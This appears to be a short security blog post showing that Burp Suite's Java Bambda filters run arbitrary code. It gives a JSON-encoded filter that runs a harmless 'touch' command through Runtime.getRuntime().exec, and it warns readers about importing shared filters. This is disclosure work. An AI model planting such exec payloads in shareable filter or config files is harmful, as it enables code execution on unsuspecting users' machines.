Post

RCE in Burp's Bambda filters

New Burp feature

On October 20th, 2023 Portswigger released a neat feature – Java Bambdas. Basically, they are just Java code snippets dynamically compiled and run by BurpSuite.

At the time of writing this post, Bambdas can be used to implement custom filters in Intruder1.

How cool is that! We can now execute custom Java code without the need to side load a custom Burp extension.

Naturally, I was very curious to see how hard it would be to achive RCE via a malicious Burp Bambda. Well, not hard at all! Burp provides full Java runtime context to the code, so your typical payload Runtime.getRuntime().exec("...") would work just fine:

Exploitation

Things become even more fun if you take into consideration the fact that you can import Bambdas from and export them to JSON files1, which can later be shared between devices. JSON-encoded Bambda from the screenshot above would look like this:

1
2
3
4
5
6
7
{
    "bambda":{
        "http_history_display_filter":{
            "bambda":"Runtime.getRuntime().exec(\"touch /tmp/hello_from_burp\");\nreturn true;"
        }
    }
}

So, watch out for RCEs when downloading “hot” filters from shady guys on Twitter next time!

This post is licensed under CC BY 4.0 by the author.